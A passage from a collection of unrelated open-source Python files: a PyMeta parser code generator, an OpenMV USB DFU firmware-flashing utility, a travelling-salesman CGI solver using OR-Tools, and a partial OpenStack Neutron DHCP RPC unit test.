def exactly(self, expr):
return ["Exactly", expr]
def match_string(self, expr):
return ["MatchString", expr]
def many(self, expr):
return ["Many", expr]
def many1(self, expr):
return ["Many1", expr]
def optional(self, expr):
return ["Optional", expr]
def _or(self, exprs):
return ["Or"] + exprs
def _not(self, expr):
return ["Not", expr]
def _xor(self, exprs):
return ["Xor"] + exprs
def lookahead(self, expr):
return ["Lookahead", expr]
def sequence(self, exprs):
return ["And"] + exprs
def bind(self, expr, name):
return ["Bind", name, expr]
def pred(self, expr):
return ["Predicate", expr]
def action(self, expr):
return ["Action", expr]
def expr(self, expr):
return ["Python", expr]
def listpattern(self, exprs):
return ["List", exprs]
def consumedby(self, exprs):
return ["ConsumedBy", exprs]
def index_consumedby(self, exprs):
return ["IndexConsumedBy", exprs]
def range(self, c1, c2):
return ["Range", c1, c2]
def interleave(self, exprs):
return ["Interleave"]+exprs
class PythonWriter(object):
"""
Converts an OMeta syntax tree into Python source.
"""
def __init__(self, tree):
self.tree = tree
self.lines = []
self.gensymCounter = 0
def _generate(self, retrn=False):
result = self._generateNode(self.tree)
if retrn:
self.lines.append("return (%s, self.currentError)" % (result,))
elif result:
self.lines.append(result)
return self.lines
def output(self):
return '\n'.join(self._generate())
def _generateNode(self, node):
name = node[0]
args = node[1:]
return getattr(self, "generate_"+name)(*args)
def _gensym(self, name):
"""
Produce a unique name for a variable in generated code.
"""
self.gensymCounter += 1
return "_G_%s_%s" % (name, self.gensymCounter)
def _newThunkFor(self, name, expr):
"""
Define a new function of no arguments.
@param name: The name of the rule generating this thunk.
@param expr: A list of lines of Python code.
"""
subwriter = self.__class__(expr)
flines = subwriter._generate(retrn=True)
fname = self._gensym(name)
self._writeFunction(fname, (), flines)
return fname
def _expr(self, typ, e):
"""
Generate the code needed to execute the expression, and return the
variable name bound to its value.
"""
name = self._gensym(typ)
self.lines.append("%s, lastError = %s" % (name, e))
self.lines.append("self.considerError(lastError)")
return name
def _writeFunction(self, fname, arglist, flines):
"""
Generate a function.
@param head: The initial line defining the function.
@param body: A list of lines for the function body.
"""
self.lines.append("def %s(%s):" % (fname, ", ".join(arglist)))
for line in flines:
self.lines.append((" " * 4) + line)
return fname
def compilePythonExpr(self, expr):
"""
Generate code for running embedded Python expressions.
"""
return self._expr('python', 'eval(%r, self.globals, _locals), None' %(expr,))
def generate_Apply(self, ruleName, codeName, rawArgs):
"""
Create a call to self.apply(ruleName, *args).
"""
args = [self._generateNode(x) for x in rawArgs]
if ruleName == 'super':
return self._expr('apply', 'self.superApply("%s", %s)' % (codeName,
', '.join(args)))
return self._expr('apply', 'self._apply(self.rule_%s, "%s", [%s])' % (ruleName,
ruleName,
', '.join(args)))
def generate_Exactly(self, literal):
"""
Create a call to self.exactly(literal).
"""
return self._expr('exactly', 'self.exactly(%r)' % (literal,))
def generate_MatchString(self, literal):
"""
Create a call to self.match_string(literal).
"""
return self._expr('match_string', 'self.match_string(%r)' % (literal,))
def generate_Many(self, expr):
"""
Create a call to self.many(lambda: expr).
"""
fname = self._newThunkFor("many", expr)
return self._expr('many', 'self.many(%s)' % (fname,))
def generate_Many1(self, expr):
"""
Create a call to self.many(lambda: expr).
"""
fname = self._newThunkFor("many1", expr)
return self._expr('many1', 'self.many(%s, %s())' % (fname, fname))
def generate_Optional(self, expr):
"""
Try to parse an expr and continue if it fails.
"""
realf = self._newThunkFor("optional", expr)
passf = self._gensym("optional")
self._writeFunction(passf, (), ["return (None, self.input.nullError())"])
return self._expr('or', 'self._or([%s])' % (', '.join([realf, passf])))
def generate_Or(self, *exprs):
"""
Create a call to
self._or([lambda: expr1, lambda: expr2, ... , lambda: exprN]).
"""
if len(exprs) > 1:
fnames = [self._newThunkFor("or", expr) for expr in exprs]
return self._expr('or', 'self._or([%s])' % (', '.join(fnames)))
else:
return self._generateNode(exprs[0])
def generate_Xor(self, *exprs):
"""
Create a call to
self._xor([lambda: expr1, lambda: expr2, ... , lambda: exprN]).
"""
if len(exprs) > 1:
fnames = [self._newThunkFor("xor", expr) for expr in exprs]
return self._expr('xor', 'self._xor([%s])' % (', '.join(fnames)))
else:
return self._generateNode(exprs[0])
def generate_Not(self, expr):
"""
Create a call to self._not(lambda: expr).
"""
fname = self._newThunkFor("not", expr)
return self._expr("not", "self._not(%s)" % (fname,))
def generate_Lookahead(self, expr):
"""
Create a call to self.lookahead(lambda: expr).
"""
fname = self._newThunkFor("lookahead", expr)
return self._expr("lookahead", "self.lookahead(%s)" %(fname,))
def generate_And(self, *exprs):
"""
Generate code for each statement in order.
"""
v = None
for ex in exprs:
v = self._generateNode(ex)
return v
def generate_Bind(self, name, expr):
"""
Bind the value of 'expr' to a name in the _locals dict.
"""
v = self._generateNode(expr)
ref = "_locals['%s']" % (name,)
self.lines.append("%s = %s" %(ref, v))
return ref
def generate_Predicate(self, expr):
"""
Generate a call to self.pred(lambda: expr).
"""
fname = self._newThunkFor("pred", expr)
return self._expr("pred", "self.pred(%s)" %(fname,))
def generate_Action(self, expr):
"""
Generate this embedded Python expression on its own line.
"""
return self.compilePythonExpr(expr)
def generate_Python(self, expr):
"""
Generate this embedded Python expression on its own line.
"""
return self.compilePythonExpr(expr)
def generate_List(self, expr):
"""
Generate a call to self.listpattern(lambda: expr).
"""
fname = self._newThunkFor("listpattern", expr)
return self._expr("listpattern", "self.listpattern(%s)" %(fname,))
def generate_Rule(self, name, expr):
rulelines = ["_locals = {'self': self}",
"self.locals[%r] = _locals" % (name,)]
subwriter = self.__class__(expr)
flines = subwriter._generate(retrn=True)
rulelines.extend(flines)
self._writeFunction("rule_" + name, ("self",), rulelines)
def generate_Grammar(self, name, rules):
self.lines.append("class %s(GrammarBase):" % (name,))
self.lines.append(" globals = globals()")
start = len(self.lines)
for rule in rules:
self._generateNode(rule)
self.lines.extend(['', ''])
self.lines[start:] = [line and (' ' * 4 + line) for line in self.lines[start:]]
del self.lines[-1:]
def generate_ConsumedBy(self, expr):
fname = self._newThunkFor("consumed_by", expr)
return self._expr("consumed_by", "self.consumed_by(%s)" % (fname,))
def generate_IndexConsumedBy(self, expr):
fname = self._newThunkFor("index_consumed_by", expr)
return self._expr("index_consumed_by", "self.index_consumed_by(%s)" % (fname,))
def generate_Range(self, c1, c2):
"""
Create a call to self.range(c1, c2)
"""
return self._expr('range', 'self.range(%r, %r)' % (c1, c2))
def generate_Interleave(self, *exprs):
"""
Create a call to
self._interleave([lambda: expr1, lambda: expr2, ... , lambda: exprN]).
"""
if len(exprs) > 1:
args = []
for x, expr, name in exprs:
args.append(repr(x))
args.append(self._newThunkFor("interleave", expr))
args.append(repr(name))
return self._expr('interleave', 'self._interleave(_locals, %s)' % (', '.join(args)))
else:
return self._generateNode(exprs[0])
class BootWriter(PythonWriter):
def generate_Grammar(self, name, rules):
self.lines.append("from pymeta.bootbase import BootBase as GrammarBase")
self.lines.append("import string")
super(BootWriter, self).generate_Grammar(name, rules)
def writePython(tree):
pw = PythonWriter(tree)
return pw.output()
def writeBoot(tree):
pw = BootWriter(tree)
return pw.output()
class GeneratedCodeLoader(object):
"""
Object for use as a module's __loader__, to display generated
source.
"""
def __init__(self, source):
self.source = source
def get_source(self, name):
return self.source
def moduleFromGrammar(tree, className, superclass, globalsDict):
source = writePython(tree)
modname = "pymeta_grammar__" + className
filename = "/pymeta_generated_code/" + modname + ".py"
mod = module(modname)
mod.__dict__.update(globalsDict)
mod.__name__ = modname
mod.__dict__[superclass.__name__] = superclass
mod.__dict__["GrammarBase"] = superclass
mod.__loader__ = GeneratedCodeLoader(source)
code = compile(source, filename, "exec")
eval(code, mod.__dict__)
mod.__dict__[className].globals = globalsDict
sys.modules[modname] = mod
linecache.getlines(filename, mod.__dict__)
return mod.__dict__[className]
| |
#!/usr/bin/env python
# This file is part of the OpenMV project.
# Copyright (c) 2013/2014 Ibrahim Abdelkader <i.abdalkader@gmail.com>
# This work is licensed under the MIT license, see the file LICENSE for
# details.
"""This module implements enough functionality to program the STM32F4xx over
DFU, without requiringdfu-util.
See app note AN3156 for a description of the DFU protocol.
See document UM0391 for a dscription of the DFuse file.
"""
from __future__ import print_function
import argparse
import re
import struct
import sys
import usb.core
import usb.util
import zlib
# VID/PID
__VID = 0x0483
__PID = 0xdf11
# USB request __TIMEOUT
__TIMEOUT = 4000
# DFU commands
__DFU_DETACH = 0
__DFU_DNLOAD = 1
__DFU_UPLOAD = 2
__DFU_GETSTATUS = 3
__DFU_CLRSTATUS = 4
__DFU_GETSTATE = 5
__DFU_ABORT = 6
# DFU status
__DFU_STATE_APP_IDLE = 0x00
__DFU_STATE_APP_DETACH = 0x01
__DFU_STATE_DFU_IDLE = 0x02
__DFU_STATE_DFU_DOWNLOAD_SYNC = 0x03
__DFU_STATE_DFU_DOWNLOAD_BUSY = 0x04
__DFU_STATE_DFU_DOWNLOAD_IDLE = 0x05
__DFU_STATE_DFU_MANIFEST_SYNC = 0x06
__DFU_STATE_DFU_MANIFEST = 0x07
__DFU_STATE_DFU_MANIFEST_WAIT_RESET = 0x08
__DFU_STATE_DFU_UPLOAD_IDLE = 0x09
__DFU_STATE_DFU_ERROR = 0x0a
_DFU_DESCRIPTOR_TYPE = 0x21
# USB device handle
__dev = None
__verbose = None
# USB DFU interface
__DFU_INTERFACE = 0
def init():
"""Initializes the found DFU device so that we can program it."""
global __dev
devices = get_dfu_devices(idVendor=__VID, idProduct=__PID)
if not devices:
raise ValueError('No DFU device found')
if len(devices) > 1:
raise ValueError("Multiple DFU devices found")
__dev = devices[0]
# Claim DFU interface
usb.util.claim_interface(__dev, __DFU_INTERFACE)
# Clear status
clr_status()
def clr_status():
"""Clears any error status (perhaps left over from a previous session)."""
__dev.ctrl_transfer(0x21, __DFU_CLRSTATUS, 0, __DFU_INTERFACE,
None, __TIMEOUT)
def get_status():
"""Get the status of the last operation."""
stat = __dev.ctrl_transfer(0xA1, __DFU_GETSTATUS, 0, __DFU_INTERFACE,
6, 20000)
# print (__DFU_STAT[stat[4]], stat)
return stat[4]
def mass_erase():
"""Performs a MASS erase (i.e. erases the entire device."""
# Send DNLOAD with first byte=0x41
__dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE,
"\x41", __TIMEOUT)
# Execute last command
if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
raise Exception("DFU: erase failed")
# Check command state
if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
raise Exception("DFU: erase failed")
def page_erase(addr):
"""Erases a single page."""
if __verbose:
print("Erasing page: 0x%x..." % (addr))
# Send DNLOAD with first byte=0x41 and page address
buf = struct.pack("<BI", 0x41, addr)
__dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE, buf, __TIMEOUT)
# Execute last command
if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
raise Exception("DFU: erase failed")
# Check command state
if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
raise Exception("DFU: erase failed")
def set_address(addr):
"""Sets the address for the next operation."""
# Send DNLOAD with first byte=0x21 and page address
buf = struct.pack("<BI", 0x21, addr)
__dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE, buf, __TIMEOUT)
# Execute last command
if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
raise Exception("DFU: set address failed")
# Check command state
if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
raise Exception("DFU: set address failed")
def write_memory(addr, buf, progress=None, progress_addr=0, progress_size=0):
"""Writes a buffer into memory. This routine assumes that memory has
already been erased.
"""
xfer_count = 0
xfer_bytes = 0
xfer_total = len(buf)
xfer_base = addr
while xfer_bytes < xfer_total:
if __verbose and xfer_count % 512 == 0:
print ("Addr 0x%x %dKBs/%dKBs..." % (xfer_base + xfer_bytes,
xfer_bytes // 1024,
xfer_total // 1024))
if progress and xfer_count % 256 == 0:
progress(progress_addr, xfer_base + xfer_bytes - progress_addr,
progress_size)
# Set mem write address
set_address(xfer_base+xfer_bytes)
# Send DNLOAD with fw data
chunk = min(64, xfer_total-xfer_bytes)
__dev.ctrl_transfer(0x21, __DFU_DNLOAD, 2, __DFU_INTERFACE,
buf[xfer_bytes:xfer_bytes + chunk], __TIMEOUT)
# Execute last command
if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
raise Exception("DFU: write memory failed")
# Check command state
if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
raise Exception("DFU: write memory failed")
xfer_count += 1
xfer_bytes += chunk
def write_page(buf, xfer_offset):
"""Writes a single page. This routine assumes that memory has already
been erased.
"""
xfer_base = 0x08000000
# Set mem write address
set_address(xfer_base+xfer_offset)
# Send DNLOAD with fw data
__dev.ctrl_transfer(0x21, __DFU_DNLOAD, 2, __DFU_INTERFACE, buf, __TIMEOUT)
# Execute last command
if get_status() != __DFU_STATE_DFU_DOWNLOAD_BUSY:
raise Exception("DFU: write memory failed")
# Check command state
if get_status() != __DFU_STATE_DFU_DOWNLOAD_IDLE:
raise Exception("DFU: write memory failed")
if __verbose:
print ("Write: 0x%x " % (xfer_base + xfer_offset))
def exit_dfu():
"""Exit DFU mode, and start running the program."""
# set jump address
set_address(0x08000000)
# Send DNLOAD with 0 length to exit DFU
__dev.ctrl_transfer(0x21, __DFU_DNLOAD, 0, __DFU_INTERFACE,
None, __TIMEOUT)
# Execute last command
if get_status() != __DFU_STATE_DFU_MANIFEST:
print("Failed to reset device")
# Release device
usb.util.dispose_resources(__dev)
def named(values, names):
"""Creates a dict with `names` as fields, and `values` as values."""
return dict(zip(names.split(), values))
def consume(fmt, data, names):
"""Parses the struct defined by `fmt` from `data`, stores the parsed fields
into a named tuple using `names`. Returns the named tuple, and the data
with the struct stripped off."""
size = struct.calcsize(fmt)
return named(struct.unpack(fmt, data[:size]), names), data[size:]
def cstring(string):
"""Extracts a null-terminated string from a byte array."""
return string.split(b'\0', 1)[0]
def compute_crc(data):
"""Computes the CRC32 value for the data passed in."""
return 0xFFFFFFFF & -zlib.crc32(data) - 1
def read_dfu_file(filename):
"""Reads a DFU file, and parses the individual elements from the file.
Returns an array of elements. Each element is a dictionary with the
following keys:
num - The element index
address - The address that the element data should be written to.
size - The size of the element ddata.
data - The element data.
If an error occurs while parsing the file, then None is returned.
"""
print("File: {}".format(filename))
with open(filename, 'rb') as fin:
data = fin.read()
crc = compute_crc(data[:-4])
elements = []
# Decode the DFU Prefix
#
# <5sBIB
# < little endian
# 5s char[5] signature "DfuSe"
# B uint8_t version 1
# I uint32_t size Size of the DFU file (not including suffix)
# B uint8_t targets Number of targets
dfu_prefix, data = consume('<5sBIB', data,
'signature version size targets')
print (" %(signature)s v%(version)d, image size: %(size)d, "
"targets: %(targets)d" % dfu_prefix)
for target_idx in range(dfu_prefix['targets']):
# Decode the Image Prefix
#
# <6sBI255s2I
# < little endian
# 6s char[6] signature "Target"
# B uint8_t altsetting
# I uint32_t named bool indicating if a name was used
# 255s char[255] name name of the target
# I uint32_t size size of image (not incl prefix)
# I uint32_t elements Number of elements in the image
img_prefix, data = consume('<6sBI255s2I', data,
'signature altsetting named name '
'size elements')
img_prefix['num'] = target_idx
if img_prefix['named']:
img_prefix['name'] = cstring(img_prefix['name'])
else:
img_prefix['name'] = ''
print(' %(signature)s %(num)d, alt setting: %(altsetting)s, '
'name: "%(name)s", size: %(size)d, elements: %(elements)d'
% img_prefix)
target_size = img_prefix['size']
target_data, data = data[:target_size], data[target_size:]
for elem_idx in range(img_prefix['elements']):
# Decode target prefix
# < little endian
# I uint32_t element address
# I uint32_t element size
elem_prefix, target_data = consume('<2I', target_data, 'addr size')
elem_prefix['num'] = elem_idx
print(' %(num)d, address: 0x%(addr)08x, size: %(size)d'
% elem_prefix)
elem_size = elem_prefix['size']
elem_data = target_data[:elem_size]
target_data = target_data[elem_size:]
elem_prefix['data'] = elem_data
elements.append(elem_prefix)
if len(target_data):
print("target %d PARSE ERROR" % target_idx)
# Decode DFU Suffix
# < little endian
# H uint16_t device Firmware version
# H uint16_t product
# H uint16_t vendor
# H uint16_t dfu 0x11a (DFU file format version)
# 3s char[3] ufd 'UFD'
# B uint8_t len 16
# I uint32_t crc32
dfu_suffix = named(struct.unpack('<4H3sBI', data[:16]),
'device product vendor dfu ufd len crc')
print (' usb: %(vendor)04x:%(product)04x, device: 0x%(device)04x, '
'dfu: 0x%(dfu)04x, %(ufd)s, %(len)d, 0x%(crc)08x' % dfu_suffix)
if crc != dfu_suffix['crc']:
print("CRC ERROR: computed crc32 is 0x%08x" % crc)
return
data = data[16:]
if data:
print("PARSE ERROR")
return
return elements
class FilterDFU(object):
"""Class for filtering USB devices to identify devices which are in DFU
mode.
"""
def __call__(self, device):
for cfg in device:
for intf in cfg:
return (intf.bInterfaceClass == 0xFE and
intf.bInterfaceSubClass == 1)
def get_dfu_devices(*args, **kwargs):
"""Returns a list of USB device which are currently in DFU mode.
Additional filters (like idProduct and idVendor) can be passed in to
refine the search.
"""
return list(usb.core.find(*args, find_all=True,
custom_match=FilterDFU(), **kwargs))
def get_memory_layout(device):
"""Returns an array which identifies the memory layout. Each entry
of the array will contain a dictionary with the following keys:
addr - Address of this memory segment
last_addr - Last address contained within the memory segment.
size - size of the segment, in bytes
num_pages - number of pages in the segment
page_size - size of each page, in bytes
"""
cfg = device[0]
intf = cfg[(0, 0)]
mem_layout_str = usb.util.get_string(device, 255, intf.iInterface)
mem_layout = mem_layout_str.split('/')
addr = int(mem_layout[1], 0)
segments = mem_layout[2].split(',')
seg_re = re.compile(r'(\d+)\*(\d+)(.)(.)')
result = []
for segment in segments:
seg_match = seg_re.match(segment)
num_pages = int(seg_match.groups()[0], 10)
page_size = int(seg_match.groups()[1], 10)
multiplier = seg_match.groups()[2]
if multiplier == 'K':
page_size *= 1024
if multiplier == 'M':
page_size *= 1024 * 1024
size = num_pages * page_size
last_addr = addr + size - 1
result.append(named((addr, last_addr, size, num_pages, page_size),
"addr last_addr size num_pages page_size"))
addr += size
return result
def list_dfu_devices(*args, **kwargs):
"""Prints a lits of devices detected in DFU mode."""
devices = get_dfu_devices(*args, **kwargs)
if not devices:
print("No DFU capable devices found")
return
for device in devices:
print("Bus {} Device {:03d}: ID {:04x}:{:04x}"
.format(device.bus, device.address,
device.idVendor, device.idProduct))
layout = get_memory_layout(device)
print("Memory Layout")
for entry in layout:
print(" 0x{:x} {:2d} pages of {:3d}K bytes"
.format(entry['addr'], entry['num_pages'],
entry['page_size'] // 1024))
def write_elements(elements, mass_erase_used, progress=None):
"""Writes the indicated elements into the target memory,
erasing as needed.
"""
mem_layout = get_memory_layout(__dev)
for elem in elements:
addr = elem['addr']
size = elem['size']
data = elem['data']
elem_size = size
elem_addr = addr
if progress:
progress(elem_addr, 0, elem_size)
while size > 0:
write_size = size
if not mass_erase_used:
for segment in mem_layout:
if addr >= segment['addr'] and \
addr <= segment['last_addr']:
# We found the page containing the address we want to
# write, erase it
page_size = segment['page_size']
page_addr = addr & ~(page_size - 1)
if addr + write_size > page_addr + page_size:
write_size = page_addr + page_size - addr
page_erase(page_addr)
break
write_memory(addr, data[:write_size], progress,
elem_addr, elem_size)
data = data[write_size:]
addr += write_size
size -= write_size
if progress:
progress(elem_addr, addr - elem_addr, elem_size)
def cli_progress(addr, offset, size):
"""Prints a progress report suitable for use on the command line."""
width = 25
done = offset * width // size
print("\r0x{:08x} {:7d} [{}{}] {:3d}% "
.format(addr, size, '=' * done, ' ' * (width - done),
offset * 100 // size), end="")
sys.stdout.flush()
if offset == size:
print("")
def main():
"""Test program for verifying this files functionality."""
global __verbose
# Parse CMD args
parser = argparse.ArgumentParser(description='DFU Python Util')
#parser.add_argument("path", help="file path")
parser.add_argument(
"-l", "--list",
help="list available DFU devices",
action="store_true",
default=False
)
parser.add_argument(
"-m", "--mass-erase",
help="mass erase device",
action="store_true",
default=False
)
parser.add_argument(
"-u", "--upload",
help="read file from DFU device",
dest="path",
default=False
)
parser.add_argument(
"-v", "--verbose",
help="increase output verbosity",
action="store_true",
default=False
)
args = parser.parse_args()
__verbose = args.verbose
if args.list:
list_dfu_devices(idVendor=__VID, idProduct=__PID)
return
try:
init()
except ValueError as er:
print(str(er))
sys.exit(1)
if args.mass_erase:
print ("Mass erase...")
mass_erase()
if args.path:
elements = read_dfu_file(args.path)
if not elements:
return
print("Writing memory...")
write_elements(elements, args.mass_erase, progress=cli_progress)
print("Exiting DFU...")
exit_dfu()
return
print("No command specified")
if __name__ == '__main__':
main()
| |
#!/usr/bin/python
# Copyright 2015-2016 Arogi Inc
# Copyright 2010-2014 Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Antonio Medrano and Timothy J. Niblett
"""A Traveling Salesman example that imports a JSON file problem definition and
solves using the Google OR-Tools solver using constraint progrmming. Note
that our test files include other data used to solve both the MCLP and
p-Median problems.
"""
import cgi
import json
import GISOps
import numpy as np
import requests
from ortools.constraint_solver import pywrapcp
from ortools.constraint_solver import routing_enums_pb2
import warnings
warnings.filterwarnings("ignore")
def main():
objective = readJSONandSolve()
generateGEOJSON(objective)
def readJSONandSolve():
read_problem(receivedMarkerData, 1)
objective = RunTSP()
return objective
def RunTSP():
#TSP using Google OR-Tools Constraint Programming model example
PreComputeDistances() #compute the distances between points
objective = SolveModel()
return objective
def PreComputeDistances():
#declare a couple variables
global d
global xyPointArray
xyPointArray = [[None for k in range(2)] for j in range(numFeatures)]
d = [[None for i in range(numFeatures)] for j in range(numFeatures)]
# Get the distance as a function of the network using Valhalla
response = pyCurl(xyPointArray)
for k in range(numFeatures):
for l in range(numFeatures):
d[k][l] = response['many_to_many'][k][l]['distance']*10000
def pyCurl(input): #Define function to send request
global lat
global lon
global r #define the request object as r
global path_length
#Put your valhalla url here
url = 'http://valhalla:8002/many_to_many'
#Define your headers here: in this case we are using json data
headers = {'content-type': 'application/json'}
# read in the coordinates and get their distances to each other
numFeatures = len(js['features'])
i = 0;
for line in js['features']:
#Longitude
xyPointArray[i][0] = line['geometry']['coordinates'][0]
#Lattitude
xyPointArray[i][1] = line['geometry']['coordinates'][1]
i += 1
postJS = json.loads('{"costing": "auto", "units": "km"}')
coords = []
for i in range(numFeatures):
lon = xyPointArray[i][0]
lat = xyPointArray[i][1]
coords.append(createDict('lat', 'lon'))
postJS['locations'] = coords
#define r as equal to the POST request
r = requests.post(url, json = postJS, headers = headers)
#capture server response
response = r.json()
return response
def createDict(*args):
return dict(((k, eval(k)) for k in args))
def Distance(i,j):
return d[i][j]
def SolveModel():
"""Solve the problem and print the solution."""
global route
global routeCoord
warnings.filterwarnings("ignore")
# Ensure that the data is valid for making at TSP route
if numFeatures > 1:
# TSP of size args.tsp_size
# Second argument = 1 to build a single tour (it's a TSP).
# Nodes are indexed from 0 to parser_tsp_size - 1, by default the start of
# the route is node 0.
routing = pywrapcp.RoutingModel(numFeatures, 1)
search_parameters = pywrapcp.RoutingModel.DefaultSearchParameters()
# Setting first solution heuristic (cheapest addition).
search_parameters.first_solution_strategy = (routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
routing.SetArcCostEvaluatorOfAllVehicles(Distance)
assignment = routing.Solve()
if assignment:
# Inspect solution.
# Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
i = 0
route_number = 0
node = routing.Start(route_number)
routeCoord = [None]*numFeatures
while not routing.IsEnd(node):
prevNode = int(node)
node = assignment.Value(routing.NextVar(node))
routeCoord[i] = [prevNode, int(node)]
i += 1
routeCoord[numFeatures-1] = [prevNode, int(routing.Start(route_number))]
#print(route)
#print(routeCoord)
else:
print('No solution found.')
else:
print('Specify an instance greater than 0.')
return assignment.ObjectiveValue()/10000.0
#
# Read a problem instance from a file
#
def read_problem(file, readType):
global numFeatures
global js
try:
if readType == 1:
#print 'Reading JSON String Object'
js = json.loads(file)
elif readType == 2:
#print 'readFile({0})'.format(file)
with open(file,"r") as f:
js = json.load(f)
except IOError:
print 'Error reading file'
raise
# count the number of point features to connect
numFeatures = len(js['features'])
return 1
### This function will return a geojson formatted string to send back to the web
### Since it is based on the p-Median/MCLP data files we can use some of those
### atributes to send back. In this case facilityLocated represents the 'from
### node' and assignedTo represents the 'to node' for the TSP.
def generateGEOJSON(objective):
#print js
for i in range(numFeatures):
node = routeCoord[i][0]
nextNode = routeCoord[i][1]
js['features'][node]['properties']['thisNode'] = node
js['features'][node]['properties']['nextNode'] = nextNode
# if properties does not exist in the geojson, create it
if 'properties' not in js:
js['properties'] = {}
# write the objective value into the geojson
js['properties']['objective'] = objective
### As of this moment js is the output file... ready to be delivered back to
### as the solution
return 1
###########################################################
##################### The main controller code starts here.
###########################################################
# Create instance of FieldStorage and get data
form = cgi.FieldStorage()
receivedMarkerData = form.getvalue('useTheseMarkers')
# the magic happens here...
main()
# prepare for output... the GeoJSON should be returned as a string
transformedMarkerData = json.dumps(js)
print "Content-type:text/html\r\n\r\n"
print transformedMarkerData
| |
# Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from neutron_lib import constants
from neutron_lib import exceptions as n_exc
from oslo_db import exception as db_exc
from neutron.api.rpc.handlers import dhcp_rpc
from neutron.callbacks import resources
from neutron.common import constants as n_const
from neutron.common import exceptions
from neutron.common import utils
from neutron.db import provisioning_blocks
from neutron.extensions import portbindings
from neutron.tests import base
class TestDhcpRpcCallback(base.BaseTestCase):
def setUp(self):
super(TestDhcpRpcCallback, self).setUp()
self.plugin_p = mock.patch('neutron.manager.NeutronManager.get_plugin')
get_plugin = self.plugin_p.start()
self.plugin = mock.MagicMock()
get_plugin.return_value = self.plugin
self.callbacks = dhcp_rpc.DhcpRpcCallback()
self.log_p = mock.patch('neutron.api.rpc.handlers.dhcp_rpc.LOG')
self.log = self.log_p.start()
set_dirty_p = mock.patch('neutron.quota.resource_registry.'
'set_resources_dirty')
self.mock_set_dirty = set_dirty_p.start()
self.utils_p = mock.patch('neutron.plugins.common.utils.create_port')
self.utils = self.utils_p.start()
self.segment_p = mock.patch(
'neutron.manager.NeutronManager.get_service_plugins')
self.get_service_plugins = self.segment_p.start()
self.segment_plugin = mock.MagicMock()
def test_group_by_network_id(self):
port1 = {'network_id': 'a'}
port2 = {'network_id': 'b'}
port3 = {'network_id': 'a'}
grouped_ports = self.callbacks._group_by_network_id(
[port1, port2, port3])
expected = {'a': [port1, port3], 'b': [port2]}
self.assertEqual(expected, grouped_ports)
def test_get_active_networks_info(self):
plugin_retval = [{'id': 'a'}, {'id': 'b'}]
self.plugin.get_networks.return_value = plugin_retval
port = {'network_id': 'a'}
subnet = {'network_id': 'b', 'id': 'c'}
self.plugin.get_ports.return_value = [port]
self.plugin.get_subnets.return_value = [subnet]
networks = self.callbacks.get_active_networks_info(mock.Mock(),
host='host')
expected = [{'id': 'a', 'subnets': [], 'ports': [port]},
{'id': 'b', 'subnets': [subnet], 'ports': []}]
self.assertEqual(expected, networks)
def test_get_active_networks_info_with_routed_networks(self):
self.get_service_plugins.return_value = {
'segments': self.segment_plugin
}
plugin_retval = [{'id': 'a'}, {'id': 'b'}]
port = {'network_id': 'a'}
subnets = [{'network_id': 'b', 'id': 'c', 'segment_id': '1'},
{'network_id': 'a', 'id': 'e'},
{'network_id': 'b', 'id': 'd', 'segment_id': '3'}]
self.plugin.get_ports.return_value = [port]
self.plugin.get_networks.return_value = plugin_retval
hostseg_retval = ['1', '2']
self.segment_plugin.get_segments_by_hosts.return_value = hostseg_retval
self.plugin.get_subnets.return_value = subnets
networks = self.callbacks.get_active_networks_info(mock.Mock(),
host='host')
expected = [{'id': 'a', 'subnets': [subnets[1]], 'ports': [port]},
{'id': 'b', 'subnets': [subnets[0]], 'ports': []}]
self.assertEqual(expected, networks)
def _test__port_action_with_failures(self, exc=None, action=None):
port = {
'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
}
self.plugin.create_port.side_effect = exc
self.utils.side_effect = exc
self.assertIsNone(self.callbacks._port_action(self.plugin,
mock.Mock(),
{'port': port},
action))
def _test__port_action_good_action(self, action, port, expected_call):
self.callbacks._port_action(self.plugin, mock.Mock(),
port, action)
if action == 'create_port':
self.utils.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY)
else:
self.plugin.assert_has_calls([expected_call])
def test_port_action_create_port(self):
self._test__port_action_good_action(
'create_port', mock.Mock(),
mock.call.create_port(mock.ANY, mock.ANY))
def test_port_action_update_port(self):
fake_port = {'id': 'foo_port_id', 'port': mock.Mock()}
self._test__port_action_good_action(
'update_port', fake_port,
mock.call.update_port(mock.ANY, 'foo_port_id', mock.ANY))
def test__port_action_bad_action(self):
self.assertRaises(
n_exc.Invalid,
self._test__port_action_with_failures,
exc=None,
action='foo_action')
def test_create_port_catch_network_not_found(self):
self._test__port_action_with_failures(
exc=n_exc.NetworkNotFound(net_id='foo_network_id'),
action='create_port')
def test_create_port_catch_subnet_not_found(self):
self._test__port_action_with_failures(
exc=n_exc.SubnetNotFound(subnet_id='foo_subnet_id'),
action='create_port')
def test_create_port_catch_db_reference_error(self):
